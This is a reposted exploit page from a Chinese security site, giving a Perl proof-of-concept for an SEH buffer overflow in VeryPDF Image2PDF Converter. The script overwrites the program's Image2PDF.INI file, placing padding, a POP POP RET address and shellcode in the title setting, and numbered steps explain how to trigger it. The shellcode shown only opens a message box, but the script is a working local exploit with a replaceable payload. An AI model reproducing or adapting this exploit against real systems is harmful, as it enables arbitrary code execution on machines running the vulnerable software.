首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VeryPDF Image2PDF Converter SEH Buffer Overflow
来源:c0d3rc0rl3y@gmail.com 作者:Corley 发布时间:2015-10-10  
#********************************************************************************************************************************************
# 
# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
# Date: 10-7-2015
# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
# Exploit Author: Robbie Corley
# Platform Tested: Windows 7 x64
# Contact: c0d3rc0rl3y@gmail.com
# Website: 
# CVE: 
# Category: Local Exploit
#
# Description:
# The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow.  
# This can be exploited using SEH overwrite.
# 
# Instructions:  
# 1. Run this sploit as-is.  This will generate the new .ini file and place it in c:\windows, overwriting the existing file
# 2. Run the Image2PDF program, hit [try], file --> add files
# 3. Open any .tif file.  Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif
# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;)
#**********************************************************************************************************************************************
 
#standard messagebox shellcode.  
$shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
 
$padding="\x90" x 2985;
$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET
$morepadding="\x90" x 1096;
 
open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file
 
#.ini file header & shellcode
print myfile "[SaveMode]
m_iMakePDFMode=0
m_iSaveMode=0
m_szFilenameORPath=
m_iDestinationMode=0
m_bAscFilename=0
m_strFileNumber=0001
[BaseSettingDlg]
m_bCheckDespeckle=0
m_bCheckSkewCorrect=0
m_bCheckView=0
m_szDPI=default
m_bCheckBWImage=1
[SetPDFInfo]
m_szAuthor=
m_szSubject=
m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding; 
 
close (myfile); #close the file


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeYouTubeToMP3 Converter 4.0
·HP SiteScope DNS Tool Command
·Tomabo MP4 Converter 3.10.12 -
·Last PassBroker 3.2.16 - Stack
·NetUSB Stack Buffer Overflow
·LanWhoIs.exe 1.0.1.120 - Stack
·AdobeWorkgroupHelper.exe 2.8.3
·LanSpy 2.0.0.155 - Buffer Over
·libsndfile 1.0.25 Heap Overflo
·RedHat Enterprise Linux 7.1 De
·Linux/MIPS Kernel NetUSB - Rem
·ManageEngine ServiceDesk Plus
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved